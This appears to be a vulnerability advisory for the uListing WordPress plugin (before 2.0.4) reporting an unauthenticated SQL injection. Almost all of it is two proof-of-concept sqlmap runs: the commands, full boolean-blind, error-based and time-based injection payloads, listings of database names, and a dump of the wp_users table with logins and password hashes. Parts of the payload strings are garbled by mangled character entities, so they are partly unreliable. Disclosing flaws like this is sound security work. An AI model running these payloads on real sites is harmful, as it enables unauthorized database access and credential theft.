M0zeWPVDB-ID:7B32E28E-9092-4ECC-95D0-A2B9464B4A9CuListing < 2.0.4 - Unauthenticated SQL Injection
An Unauthenticated SQL Injection vulnerability was discovered in the plugin. Vulnerable parameter(s): custom. SQL Injection type(s): Error-based, Boolean-based Blind, Time-based Blind.
PoC
PoC #1 | Unauthenticated SQL Injection | Tables: sqlmap --url=“https://example.com/?ulisitng_title=13&region;=50&category;=47&bedrooms;[]=37&bathrooms;[]=31&garages;[]=43&range;[area]=739;1606&range;[price]=1998;2979&amenities;[]=16&current;_page=1” -p range[price] --dbs ___ H ___ [.]__ ___ ___ {1.5.3.16#dev} |_ -| . [,] | .'| . | || ["]|||__,| | ||V… || http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [] starting @ 16:47:59 /2021-06-18/ [16:47:59] [INFO] testing connection to the target URL [16:48:11] [INFO] testing if the target URL content is stable [16:48:25] [INFO] heuristic (basic) test shows that GET parameter ‘range[price]’ might be injectable (possible DBMS: ‘MySQL’) [16:51:01] [INFO] testing ‘AND boolean-based blind - WHERE or HAVING clause’ [16:51:11] [WARNING] reflective value(s) found and filtering out [16:51:57] [INFO] testing ‘Boolean-based blind - Parameter replace (original value)’ [16:52:02] [INFO] testing ‘Generic inline queries’ [16:52:06] [INFO] testing ‘AND boolean-based blind - WHERE or HAVING clause (MySQL comment)’ [16:54:12] [INFO] testing ‘OR boolean-based blind - WHERE or HAVING clause (MySQL comment)’ [16:55:55] [INFO] testing ‘OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)’ [16:58:19] [INFO] testing ‘MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause’ [16:58:53] [INFO] GET parameter ‘range[price]’ appears to be ‘MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause’ injectable [16:58:53] [INFO] testing ‘MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)’ [16:59:07] [INFO] testing ‘MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)’ [16:59:14] [INFO] testing ‘MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)’ [16:59:23] [INFO] testing ‘MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)’ [16:59:33] [INFO] testing ‘MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)’ [16:59:35] [INFO] testing ‘MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)’ [16:59:38] [INFO] testing ‘MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)’ [16:59:40] [INFO] testing ‘MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)’ [16:59:42] [INFO] testing ‘MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’ [16:59:51] [INFO] GET parameter ‘range[price]’ is ‘MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’ injectable [16:59:51] [INFO] testing ‘MySQL inline queries’ [16:59:53] [INFO] testing ‘MySQL >= 5.0.12 stacked queries (comment)’ [16:59:58] [INFO] testing ‘MySQL >= 5.0.12 stacked queries’ [17:00:00] [INFO] testing ‘MySQL >= 5.0.12 stacked queries (query SLEEP - comment)’ [17:00:02] [INFO] testing ‘MySQL >= 5.0.12 stacked queries (query SLEEP)’ [17:00:04] [INFO] testing ‘MySQL < 5.0.12 stacked queries (heavy query - comment)’ [17:00:07] [INFO] testing ‘MySQL < 5.0.12 stacked queries (heavy query)’ [17:00:09] [INFO] testing ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’ [17:01:20] [INFO] GET parameter ‘range[price]’ appears to be ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’ injectable [17:06:45] [INFO] target URL appears to be UNION injectable with 49 columns injection not exploitable with NULL values. Do you want to try with a random integer value for option ‘–union-char’? [Y/n] Y [17:25:10] [INFO] testing ‘MySQL UNION query (25) - 61 to 80 columns’ [17:26:04] [INFO] testing ‘MySQL UNION query (25) - 81 to 100 columns’ GET parameter ‘range[price]’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 737 HTTP(s) requests: -– Parameter: range[price] (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ulisitng_title=13®ion;=50&category;=47&bedrooms;[]=37&bathrooms;[]=31&garages;[]=43⦥[area]=739;1606⦥[price]=1998;2979) RLIKE (SELECT (CASE WHEN (4580=4580) THEN 0x313939383b32393739 ELSE 0x28 END)) AND (5841=5841&amenities;[]=16¤t;_page=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: ulisitng_title=13®ion;=50&category;=47&bedrooms;[]=37&bathrooms;[]=31&garages;[]=43⦥[area]=739;1606⦥[price]=1998;2979) AND (SELECT 4060 FROM(SELECT COUNT(),CONCAT(0x7176717171,(SELECT (ELT(4060=4060,1))),0x7178707171,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (4201=4201&amenities;[]=16¤t;_page=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ulisitng_title=13®ion;=50&category;=47&bedrooms;[]=37&bathrooms;[]=31&garages;[]=43⦥[area]=739;1606⦥[price]=1998;2979) AND (SELECT 9207 FROM (SELECT(SLEEP(60)))BqKJ) AND (1336=1336&amenities;[]=16¤t;_page=1 -– [18:16:03] [INFO] the back-end DBMS is MySQL web application technology: PHP 7.3.28 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [18:16:03] [INFO] fetching database names [18:16:03] [INFO] resumed: ‘information_schema’ [18:16:03] [INFO] resumed: ‘db_inusti’ [18:16:03] [INFO] resumed: ‘db_tolips’ [18:16:03] [INFO] resumed: ‘db_krowd’ [18:16:03] [INFO] resumed: ‘db_halpes’ [18:16:03] [INFO] resumed: ‘db_kitecx’ [18:16:03] [INFO] resumed: ‘db_indutri’ [18:16:03] [INFO] resumed: ‘db_codesk’ [18:16:03] [INFO] resumed: ‘db_ziston’ available databases [9]: [] db_codesk [] db_halpes [] db_indutri [] db_inusti [] db_kitecx [] db_krowd [] db_tolips [] db_ziston [] information_schema [] ending @ 18:16:03 /2021-06-18/ PoC #2 | Unauthenticated SQL Injection | wp_users data: sqlmap --url=“https://example.com/?ulisitng_title=13&region;=50&category;=47&bedrooms;[]=37&bathrooms;[]=31&garages;[]=43&range;[area]=739;1606&range;[price]=1998;2979&amenities;[]=16&current;_page=1” --dbms=MySQL -p bedrooms[],bathrooms[],garages[],amenities[] --dump -D db_halpes -T wp_users -C id,user_email,user_login,user_pass ___ H ___ [(]__ ___ ___ {1.5.4.7#dev} |_ -| . [,] | .'| . | || [)]|||__,| | ||V… || http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [] starting @ 10:15:24 /2021-06-18/ [10:15:25] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: -– Parameter: bedrooms[] (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: ulisitng_title=13®ion;=50&category;=47&bedrooms;[]=37)) RLIKE (SELECT (CASE WHEN (7907=7907) THEN 37 ELSE 0x28 END)) AND ((2011=2011&bathrooms;[]=31&garages;[]=43⦥[area]=739;1606⦥[price]=1998;2979&amenities;[]=16¤t;_page=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: ulisitng_title=13®ion;=50&category;=47&bedrooms;[]=37)) AND (SELECT 4032 FROM(SELECT COUNT(*),CONCAT(0x7176717171,(SELECT (ELT(4032=4032,1))),0x7178707171,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ((6842=6842&bathrooms;[]=31&garages;[]=43⦥[area]=739;1606⦥[price]=1998;2979&amenities;[]=16¤t;_page=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ulisitng_title=13®ion;=50&category;=47&bedrooms;[]=37)) AND (SELECT 8493 FROM (SELECT(SLEEP(60)))bkzv) AND ((7707=7707&bathrooms;[]=31&garages;[]=43⦥[area]=739;1606⦥[price]=1998;2979&amenities;[]=16¤t;_page=1 -– [10:15:28] [INFO] testing MySQL [10:15:30] [INFO] confirming MySQL [10:15:32] [WARNING] reflective value(s) found and filtering out [10:15:32] [INFO] the back-end DBMS is MySQL web application technology: PHP 7.3.28 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [10:15:32] [INFO] fetching entries of column(s) ‘id,user_email,user_login,user_pass’ for table ‘wp_users’ in database ‘db_halpes’ [10:15:37] [INFO] retrieved: ‘1’ [10:15:41] [INFO] retrieved: ‘admin’ [10:15:44] [INFO] retrieved: ‘$P$BPWwu9ckgcGGLsxZOYC2ZTkwyhanNL/’ [10:15:46] [INFO] retrieved: ‘2’ [10:15:49] [INFO] retrieved: ‘demo’ [10:15:51] [INFO] retrieved: ‘$P$BkS.t/WvGfkY/SvNSUn3wRjIQB9pX3.’ [10:15:52] [INFO] retrieved: ‘3’ [10:15:55] [INFO] retrieved: ‘give_donor’ [10:15:57] [INFO] retrieved: ‘$P$BUfswym5bmce6zMYuxpAv3J4992KyH.’ [10:15:58] [INFO] retrieved: ‘4’ [10:16:02] [INFO] retrieved: ‘give_accountant’ [10:16:04] [INFO] retrieved: ‘$P$BpwUDTczEe4WWe3jYnoL.mMdwHCfeK1’ [10:16:06] [INFO] retrieved: ‘5’ [10:16:09] [INFO] retrieved: ‘give_manager’ [10:16:10] [INFO] retrieved: ‘$P$BsODaEu5jVKRPcp18M6KRbppca824U0’ [10:16:12] [INFO] retrieved: ‘6’ [10:16:15] [INFO] retrieved: ‘give_worker’ [10:16:17] [INFO] retrieved: ‘$P$B7VkAhs8ZYm0YbjbqpNhHFPB3Mc7Px.’ Database: db_halpes Table: wp_users [6 entries] ±—±-----------±----------------±-----------------------------------+ | id | user_email | user_login | user_pass | ±—±-----------±----------------±-----------------------------------+ | 1 | | admin | $P$BPWwu9ckgcGGLsxZOYC2ZTkwyhanNL/ | | 2 | | demo | $P$BkS.t/WvGfkY/SvNSUn3wRjIQB9pX3. | | 3 | | give_donor | $P$BUfswym5bmce6zMYuxpAv3J4992KyH. | | 4 | | give_accountant | $P$BpwUDTczEe4WWe3jYnoL.mMdwHCfeK1 | | 5 | | give_manager | $P$BsODaEu5jVKRPcp18M6KRbppca824U0 | | 6 | | give_worker | $P$B7VkAhs8ZYm0YbjbqpNhHFPB3Mc7Px. | ±—±-----------±----------------±-----------------------------------+ [] ending @ 11:03:34 /2021-06-18/
Related
